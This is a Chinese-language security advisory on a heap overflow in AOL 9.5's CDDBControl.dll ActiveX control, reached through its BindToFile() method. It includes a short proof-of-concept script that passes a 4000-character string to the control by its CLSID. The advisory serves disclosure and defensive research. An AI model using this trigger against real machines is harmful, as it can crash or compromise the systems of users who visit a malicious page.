受影响系统:
AOL AOL 9.5
描述:
BUGTRAQ ID: 37834
America Online是美国在线发布的基于Internet Explorer技术的客户端软件,可提供安全性和可用性功能。
AOL所安装的CDDBControl.dll Activex控件没有正确地过滤提交给BindToFile()方式的字符串参数,用户受骗访问了恶意网页并传送超长参数就可以触发堆溢出,导致执行任意指令。
<*来源:karak0rsan (karakorsankara@hotmail.com)
链接:http://marc.info/?l=bugtraq&m=126384091301813&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<package><job id=’DoneInVBS’ debug=’false’ error=’true’>
<object classid=’clsid:BC8A96C6-3909-11D5-9001-00C04F4C3B9F’ id=’target’ />
<script language=’vbscript’>
arg1=String(4000, "A")
arg2=1
target.BindToFile arg1 ,arg2
</script>
</job>
</package>
建议:
厂商补丁:
AOL
—
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://toolbar.aol.com/aol/download.html?ncid=AOLCMP00300000001073
0 条评论。